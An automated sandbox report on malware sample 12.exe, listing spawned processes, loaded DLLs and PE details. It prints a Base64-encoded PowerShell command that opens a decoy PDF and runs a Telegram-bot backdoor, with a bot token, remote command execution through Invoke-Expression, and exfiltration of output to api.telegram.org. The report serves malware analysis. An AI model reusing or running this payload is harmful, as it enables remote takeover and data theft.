CgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\file.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1636,i,11664794565421518283,13165857320494331314,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\12.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: 12.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 12.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Admin\source\repos\ConsoleApplication5\x64\Release\ConsoleApplication5.pdb" source: 12.exe
Source: Binary string: mscorlib.pdb -+1 source: powershell.exe, 00000004.00000002.4214181744.000001D5D74C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 1 source: powershell.exe, 00000004.00000002.4214181744.000001D5D74C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.4214181744.000001D5D74C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ConsoleApplication5\x64\Release\ConsoleApplication5.pdb source: 12.exe
Source: 12.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 12.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 12.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 12.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 12.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Suspicious powershell command line found
